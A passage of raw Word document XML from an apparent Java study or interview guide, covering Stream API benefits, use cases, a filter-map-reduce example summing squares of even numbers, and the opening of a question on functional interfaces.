          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stream operations can be chained together, which makes it easier to express complex operations in a single flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18E3D7" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>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Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Stream API provides the ability to process elements in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, improving performance for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE99C47" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>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Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It promotes </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc., which leads to more maintainable and concise code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D1C4B" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>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Lazy Evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Intermediate operations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning they are not computed until a terminal operation is invoked. This allows for more efficient processing, especially in the case of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large datasets</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D3548B" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Use Cases of Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F3688" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>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Data Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements (e.g., square numbers, convert strings to uppercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BBD7AD" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>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Filtering Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (e.g., select only even numbers, filter users by age).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DBA47" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>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Aggregate Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aggregate</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (e.g., find the sum, average, or maximum of a collection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFF2A3" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>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Sorting Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (e.g., sort users by their names or sort numbers in ascending order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C1D94" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9. Stream API Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A475961"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Here's an example demonstrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filtering</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reducing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations using the Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CDB4C"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import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5B7C5"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import java.util.stream.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957CD25" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5865D058"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public class StreamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F699E2"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A4BBF"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List&lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B88D4A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241144D9"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 Find the sum of squares of even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B0110"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int result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B4A08D"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filter(n -&gt; n % 2 == 0)    // Filter even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FFD9E"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map(n -&gt; n * n)             // Square them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45315950"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reduce(0, (a, b) -&gt; a + b); // Sum of squares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C18E9" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49945F56"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System.out.println("Sum of squares of even numbers: " + result); // Output: 220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A4506"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6EEC3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92AB26" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC9178" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5"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The Stream API in Java provides a modern and functional approach to working with sequences of data. By leveraging stream operations like map, filter, and reduce, you can write </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clean</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concise</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelizable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easy chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operations make it highly efficient for tasks like data transformation, aggregation, and filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC2FAC" w14:textId="14126A1E" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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9E1BCBC">
          <v:rect id="_x0000_i1773" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F17CE7" w14:textId="77777777" w:rsidR="00F64AB0" w:rsidRPr="00CE4B95" w:rsidRDefault="00F64AB0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="_Toc196307726"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have more than one abstract method in a functional interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="6094E8FB" w14:textId="1F9D11BA" w:rsidR="00B57733" w:rsidRPr="00397A42" w:rsidRDefault="00B57733" w:rsidP="00397A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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No, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is one of the key characteristics that distinguishes functional interfaces from regular interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBAC95D"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A functional interface is intended to represent a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single function</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
